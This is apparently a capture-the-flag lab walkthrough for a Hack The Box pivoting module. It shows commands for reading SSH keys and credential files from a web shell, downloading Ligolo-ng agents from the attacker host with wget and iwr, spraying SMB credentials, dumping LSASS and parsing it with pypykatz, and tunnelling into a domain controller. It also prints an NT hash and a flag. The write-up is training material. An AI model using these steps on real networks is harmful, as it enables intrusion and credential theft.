> For the complete documentation index, see [llms.txt](https://ganesha-hk.gitbook.io/offensive-security-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/pivoting-tunneling-and-port-forwarding.md).

# Pivoting, Tunneling & Port Forwarding

## &#x20;Skill Assessment Walkthrough

> **HTB Module:** Pivoting, Tunneling, and Port Forwarding **Difficulty:** Hard **Goal:** Pivot through multiple networks and capture all flags, ending at the Domain Controller **Pivoting Tool:** Ligolo-ng
>
> ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FOUcShpGFE0g34G5IlQOY%2Fimage.png?alt=media\&token=5ff87e1e-cafb-4efb-957a-725fd4327d5d)  ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FrP08tWjmzLNOy3jJNyWC%2Fimage.png?alt=media\&token=54baaac6-5c18-461d-b690-8587d4d71a0f)

***

### 📌 Scenario

A team member started a pentest against the **Inlanefreight** environment but got moved to another project. They left a **web shell** (`p0wny@shell`) for us to pick up where they left off. We need to pivot through internal networks, collect credentials, and reach the **Domain Controller**.

### 🎯 Targets & Network Map

```
EXTERNAL (attacker)
  │
  ▼
Web Server (10.129.201.127) ── webadmin ── SSH + p0wny webshell
  │
  │  ens192: 172.16.5.15
  ▼
PIVOT-SRV01 (172.16.5.35) ── mlefay ── Windows Server 2019 ── Flag #1
  │
  │  second NIC: 172.16.6.35
  ▼
PIVOTWIN10 (172.16.6.25) ── vfrank ── Windows 10 ── Flag #2
  │
  │  Mapped Z: drive → DC
  ▼
DC (AutomateDCAdmin Z:) ── Flag #3 (final)
```

### 🗺️ Attack Chain

```
p0wny webshell → id_rsa + creds (mlefay) → SSH as webadmin
  → Ligolo pivot #1 (172.16.5.0/24)
    → RDP to PIVOT-SRV01 (mlefay) → Flag #1
      → LSASS dump → pypykatz → vfrank creds
        → Ligolo double pivot #2 (172.16.6.0/24)
          → RDP to PIVOTWIN10 (vfrank) → Flag #2
            → Z: drive (DC) → Flag #3 🏴
```

***

***

## Step 1 — Web Shell Access

Browse to the target IP or `support.inlanefreight.local`. We land on the **p0wny\@shell** web shell running as `www-data` in `/var/www/html`.

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FOizgtT34wYr5OYCVkZ1G%2Fimg-000.png?alt=media&amp;token=cd34fab7-64b9-4345-998d-cfdedf7ec7e3" alt="" data-size="original">

***

## Step 2 — Finding SSH Key & Credentials

Dig around from the webshell. Check `/home/webadmin/`:

```bash
ls -la /home/webadmin/
cat /home/webadmin/id_rsa
```

We find:

* `id_rsa` — webadmin's SSH private key
* `for-admin-eyes-only` — contains credentials for the next hop

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F2FfC0CkpUW6QhxcUnjlp%2Fimg-001.png?alt=media&amp;token=ac97b027-6821-4ebe-b2b8-8484c396073f" alt="" data-size="original">

***

## Step 3 — SSH In & Reading Credentials

Save the `id_rsa` to our machine, set permissions, and SSH in:

```bash
chmod 600 id_rsa
ssh -i id_rsa webadmin@10.129.201.127
```

Now read the credential file:

```bash
cat for-admin-eyes-only
```

```
# note to self,
in order to reach server01 or other servers in the subnet from here you h
us the user account:mlefay
with a password of :
P<redacted>
```

New creds: `mlefay : P<password>`

Also check the internal network interface:

```bash
ifconfig ens192
```

Internal IP: `172.16.5.15` — we need to pivot into `172.16.5.0/24`.

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FhNja6r7WospjEVX8Pt48%2Fimg-002.png?alt=media&amp;token=9729b3b6-1fa7-4a3f-aa70-33144f7bf822" alt="" data-size="original">

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2Fh96G3eJz4iiHi9QsuWVp%2Fimg-003.png?alt=media&amp;token=cf969c6d-5b7b-4061-84fb-ebf2d218e498" alt="" data-size="original">

***

## Step 4 — Ligolo-ng Pivot #1 (172.16.5.0/24)

#### Upload Ligolo Agent to Webadmin

Serve the agent from our machine:

```bash
python3 -m http.server 8001
```

On webadmin:

```bash
wget http://<vpn-ip>:8001/agent
chmod +x agent
```

#### Start Ligolo Server (Attacker)

```bash
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:11666
```

#### Connect Agent (Webadmin)

```bash
./agent -connect <vpn-ip>:11666 -ignore-cert
```

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FV7EeN38N4g0O9cX9wCaP%2Fimg-004.png?alt=media&amp;token=809074cd-26d0-4dbf-a479-d1c2b9f8bbf9" alt="" data-size="original">

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F9ItaJCdOfIiEL0Jlf2TY%2Fimg-005.png?alt=media&amp;token=7d54d51d-c00e-481e-a747-aefe37b47cee" alt="" data-size="original">

#### Configure Tunnel (Ligolo Shell)

```
interface_create --name internal1
route_add --name internal1 --route 172.16.5.0/24
session               # select session 1
start --tun internal1
```

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F4K4mDm9FXpzlkRc4IDO9%2Fimg-006.png?alt=media&amp;token=ba1007d1-0e43-4519-9955-afe816df223b" alt="" data-size="original">

***

## Step 5 — Host Discovery & SMB Validation

Ping sweep to find live hosts in `172.16.5.0/24`:

```bash
for i in {1..254}; do
    ping -c 1 -W 1 172.16.5.$i 2>/dev/null | grep "bytes from"
done
```

Live hosts: `172.16.5.15` (webadmin) and `172.16.5.35` (new target!)

Validate creds with netexec/crackmapexec:

```bash
netexec smb 172.16.5.0/24 -u mlefay -p '<password>' --local-auth
```

`172.16.5.35` (PIVOT-SRV01) — Windows 10 / Server 2019 Build 17763 — creds work! ✅

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F7c1M2iKG55qjfaxHF8Lk%2Fimg-007.png?alt=media&amp;token=e002a6b4-a8b8-4485-bad7-853cada21135" alt="" data-size="original">

***

## Step 6 — RDP to PIVOT-SRV01 & Flag #1

```bash
xfreerdp /v:172.16.5.35 /u:mlefay /p:'<password>' /cert:ignore
```

We land on PIVOT-SRV01. On the `C:\` drive we find `Flag` — a text document.

**Flag #1 captured!** 🏴

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2Fbp8HC0NNxP9DAxxYr6UZ%2Fimg-008.png?alt=media&amp;token=38bc3f16-9c8b-4174-ab72-42c76da067d5" alt=""><figcaption></figcaption></figure>

>

***

## Step 7 — LSASS Dump & Credential Extraction

On PIVOT-SRV01, dump LSASS:

1. Open **Task Manager** → **Processes** tab
2. Find **Local Security Authority Process** (lsass.exe)
3. Right-click → **Create dump file**

The dump file is saved at:

```
C:\Users\mlefay\AppData\Local\Temp\lsass.DMP
```

Transfer `lsass.DMP` to attacker via shared drive or download:

```cmd
iwr http://172.16.5.15:8001/agent.exe -Outfile agent.exe
```

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2Fj5OGa95iear1uR34Xx6Q%2Fimg-009.png?alt=media&amp;token=01444e68-dedb-4e74-9a99-e487ee485e84" alt="" data-size="original">

#### Parse with pypykatz (Attacker)

```bash
pypykatz lsa minidump lsass.DMP
```

Found **vfrank** credentials:

```
Username: vfrank
Domain:   INLANEFREIGHT
NT:       2e16a00be74fa0bf862b4256d0347e83
Kerberos Password: Im<redacted>
```

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FuVhmCa8fA8DB0dBu9IGR%2Fimg-010.png?alt=media&amp;token=3f162327-6e92-4c49-a117-5500a3caa5c9" alt=""><figcaption></figcaption></figure>

>

***

## Step 8 — Ligolo Double Pivot #2 (172.16.6.0/24)

PIVOT-SRV01 has a second NIC at `172.16.6.35`. We need to reach `172.16.6.0/24`.

#### Transfer Agent to PIVOT-SRV01

On PIVOT-SRV01 (cmd):

```cmd
.\agent.exe -connect 172.16.5.15:9776 -ignore-cert
```

#### Configure Double Pivot (Ligolo Shell)

```
interface_create --name internal2
route_add --name internal2 --route 172.16.6.0/24
listener_add --addr 0.0.0.0:9776 --to 127.0.0.1:11666 --tcp
session               # select session 2 (PIVOT-SRV01)
start --tun internal2
```

Both tunnels now active! 🔥

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F2J5gqUnlUoljuQeBmnXu%2Fimg-011.png?alt=media&amp;token=9343725d-182c-48bc-8873-ceaecd79dc57" alt="" data-size="original">

***

## Step 9 — Host Discovery in 172.16.6.0/24

```bash
for i in {1..254}; do
    ping -c 1 -W 1 172.16.6.$i 2>/dev/null | grep "bytes from"
done
```

Live hosts: `172.16.6.25` and `172.16.6.35` (PIVOT-SRV01's second NIC)

New target: `172.16.6.25` 🎯

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2Fh7EsjrwkD4522dUZUEgV%2Fimg-012.png?alt=media&amp;token=fd813f83-51ad-432a-95cb-5f72adc17582" alt="" data-size="original">

***

## Step 10 — RDP to PIVOTWIN10 & Flag #2

RDP in using vfrank's creds:

```bash
xfreerdp /v:172.16.6.25 /u:vfrank /p:'<password>' /cert:ignore
```

We land on **PIVOTWIN10** (172.16.6.25). On the `C:\` drive there's a `Flag` text file.

**Flag #2 captured!** 🏴

> <img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FIf0srPvmMCsx2d8uDOgE%2Fimg-013.png?alt=media&amp;token=21946d35-e3e3-46bc-bc22-71bc83ccdaa1" alt="" data-size="original">

***

## Step 11 — Mapped Z: Drive → Domain Controller & Flag #3

On PIVOTWIN10, there's a **mapped Z: drive** labeled `AutomateDCAdmin`. Open it using vfrank's credentials when prompted.

This maps directly to the **Domain Controller's C: drive**. Inside we see `Flag.txt`.

Open it:

```
3nd-xxxxxxxxxx
```

**Flag #3 (final) captured!** 🏆

> ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FZzvsIiljmWKqNH8gHw59%2Fimage.png?alt=media\&token=21ecf114-db07-49d9-9811-1ac705b02b99)

***

## 🏆 Pwned — All Flags Captured!

Triple pivot from external to Domain Controller. Web shell → SSH → Ligolo tunnel → RDP → LSASS dump → double pivot → DC mapped drive.

#### Flags Summary

| # | Host              | Location               | Flag                   |
| - | ----------------- | ---------------------- | ---------------------- |
| 1 | PIVOT-SRV01       | `C:\Flag`              | *(redacted)*           |
| 2 | PIVOTWIN10        | `C:\Flag`              | *(redacted)*           |
| 3 | Domain Controller | `Z:\Flag.txt` (mapped) | `3nd-0xf-Th3-R@inbow!` |

#### Tools Used

| Tool         | Purpose                             |
| ------------ | ----------------------------------- |
| p0wny\@shell | Initial web shell access            |
| `ssh`        | SSH access with discovered id\_rsa  |
| `ligolo-ng`  | SOCKS-less pivoting (proxy + agent) |
| `netexec`    | SMB credential validation           |
| `xfreerdp`   | RDP access to Windows targets       |
| Task Manager | LSASS process dump                  |
| `pypykatz`   | Offline LSASS dump parsing          |
| `ping`       | Host discovery via sweep            |

***

> **GG 🏴** — Web shell → SSH → Ligolo pivot → RDP → LSASS dump → double pivot → DC mapped drive → All 3 flags.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/pivoting-tunneling-and-port-forwarding.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
